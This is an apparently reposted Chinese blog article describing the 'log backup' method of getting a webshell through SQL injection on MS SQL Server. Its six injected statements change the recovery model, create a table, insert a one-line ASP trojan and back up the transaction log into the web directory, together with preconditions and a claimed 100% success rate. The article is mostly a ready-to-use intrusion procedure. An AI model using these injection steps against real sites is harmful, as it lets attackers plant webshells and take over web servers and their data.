概述
一、前言
这是一种导出日志文件到web目录来获得shell的备份方法。
1.重用性好
多次备份的成功率
2.备份的SHell小
相对差异备份而言
3.成功率高
目前用backup log来测试的成功率是100%,就这样分析似乎不应该有失败的情况。
二、条件
1、必需得知道Web目录
2.Web和数据库没有分离
PS:如果WEB和数据库分离,并不代表我们没有机会,我们照样可以备份,只是需要满足些条件。
三、具体步骤:
第一步:
;alter database 库名 set RECOVERY FULL–
第二步:
;create table cmd (a image)–
第三步:
;backup log 库名 to disk = ‘c:cmd’ with init–
这样有点类似于增量备份的第一步,不过有点不同的是,做了这一步以后,备份出来的可用的shell是固定的。
第四步:
;insert into cmd (a) values (0x一句话木马)–
第五步:
;backup log 库名 to disk = ‘Web路径hack58.asp’–
第六步:
;drop table cmd–
PS:如果是字符型,请一定在语句前加’
最后
以上就是健忘灰狼为你收集整理的剖析Log备份的全部内容,希望文章能够帮你解决剖析Log备份所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复